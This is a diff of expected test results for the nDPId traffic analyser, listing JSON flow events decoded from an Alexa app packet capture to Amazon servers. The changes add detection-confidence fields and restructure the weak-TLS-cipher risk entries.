+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3355,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196942,"flow_last_seen":1490976197026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976197026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3357,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976197297,"flow_last_seen":1490976197297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976197297,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3357,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1490976197297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976197297,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8At9AAEAGSmasECrYSBXOebn2AbvarIm+AAAAAKAC\/\/+uEwAAAgQFtAQCCAoA9othAAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3361,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1490976197355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976197355,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw5DlAAOcGwhZIFc55rBAq2AG7ufYaDpo72qyJv3ASH\/6iLAAAAgQFtAEDAwY="}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3362,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1490976197356,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976197356,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoAuBAAEAGSnmsECrYSBXOebn2AbvarIm\/Gg6aPFAQAVfsnQAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3363,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976197297,"flow_last_seen":1490976197357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976197357,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3365,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1870,"flow_avg_l4_payload_len":233,"midstream":0,"ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01251{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3367,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4790,"flow_avg_l4_payload_len":479,"midstream":0,"ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}}
-00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01250{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3379,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976177116,"flow_last_seen":1490976177850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6576,"flow_avg_l4_payload_len":365,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976177116,"flow_last_seen":1490976187290,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9507,"flow_avg_l4_payload_len":380,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976195547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3363,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976197297,"flow_last_seen":1490976197357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976197357,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3365,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1870,"flow_avg_l4_payload_len":233,"midstream":0,"ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01277{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3367,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4790,"flow_avg_l4_payload_len":479,"midstream":0,"ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}}
+00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01276{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3379,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976177116,"flow_last_seen":1490976177850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6576,"flow_avg_l4_payload_len":365,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976177116,"flow_last_seen":1490976187290,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9507,"flow_avg_l4_payload_len":380,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976195547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976195547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976177276,"flow_last_seen":1490976187754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12795,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976186164,"flow_last_seen":1490976186790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5152,"flow_avg_l4_payload_len":303,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976134140,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13897,"flow_avg_l4_payload_len":463,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1490976134141,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":31504,"flow_avg_l4_payload_len":533,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976134144,"flow_last_seen":1490976135402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12573,"flow_avg_l4_payload_len":483,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134146,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14135,"flow_avg_l4_payload_len":504,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1490976134148,"flow_last_seen":1490976135505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15689,"flow_avg_l4_payload_len":506,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134149,"flow_last_seen":1490976135403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14785,"flow_avg_l4_payload_len":528,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1490976139642,"flow_last_seen":1490976140773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29286,"flow_avg_l4_payload_len":574,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976139643,"flow_last_seen":1490976140772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12822,"flow_avg_l4_payload_len":493,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
-00658{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976139643,"flow_last_seen":1490976140745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8213,"flow_avg_l4_payload_len":391,"midstream":0,"ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}}
